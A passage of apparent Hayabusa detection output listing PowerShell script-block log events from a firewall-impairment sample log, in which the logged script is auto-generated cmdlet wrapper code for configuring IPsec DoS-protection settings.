$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 
'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('StateIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${StateIdleTimeoutSeconds} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerIPRateLimitQueueIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${PerIPRateLimitQueueIdleTimeoutSeconds} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent 
= $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthPerIPRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 
'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecAuthDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecAuthRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdl",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.444 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIPsecDoSPSetting' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecDospSetting { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${StateIdleTimeoutSeconds}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${PerIPRateLimitQueueIdleTimeoutSeconds}, 
[Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecUnauthDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecUnauthRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint16] ${IpV6IPsecAuthDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecAuthRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint16] ${IcmpV6Dscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IcmpV6RateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6FilterExemptDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6FilterExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint16] ${DefBlockExemptDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${DefBlockExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${MaxStateEntries}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${MaxPerIPRateLimitQueues}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules] ${EnabledKeyingModules}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags] ${FilteringFlags}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [WildcardPattern[]] ${PublicInterfaceAliases}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [WildcardPattern[]] ${PrivateInterfaceAliases}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PublicV6Address}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PrivateV6Address}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] 
${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null 
[object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('StateIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${StateIdleTimeoutSeconds} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerIPRateLimitQueueIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${PerIPRateLimitQueueIdleTimeoutSeconds} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthDscp'; ParameterType = 'System.UInt32'; 
Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthPerIPRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = 
$__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecAuthDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecAuthRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdl",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall 
rule activation.evtx 2021-04-23 19:09:45.444 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"etization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6Dscp')) { [object]$__cmdletization_value = ${IcmpV6Dscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6RateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IcmpV6RateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6FilterExemptDscp')) { [object]$__cmdletization_value = ${IpV6FilterExemptDscp} 
$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6FilterExemptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6FilterExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptDscp')) { [object]$__cmdletization_value = ${DefBlockExemptDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 
'DefBlockExemptDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${DefBlockExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxStateEntries')) { [object]$__cmdletization_value = ${MaxStateEntries} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 
($PSBoundParameters.ContainsKey('MaxPerIPRateLimitQueues')) { [object]$__cmdletization_value = ${MaxPerIPRateLimitQueues} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnabledKeyingModules')) { [object]$__cmdletization_value = ${EnabledKeyingModules} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('FilteringFlags')) { [object]$__cmdletization_value = ${FilteringFlags} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'FilteringFlags'; ParameterType = 
'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicInterfaceAliases')) { [object]$__cmdletization_value = ${PublicInterfaceAliases} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateInterfaceAliases')) { [object]$__cmdletization_value = ${PrivateInterfaceAliases} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicV6Address')) { [object]$__cmdletization_value = ${PublicV6Address} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateV6Address')) { [object]$__cmdletization_value = ${PrivateV6Address} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = 
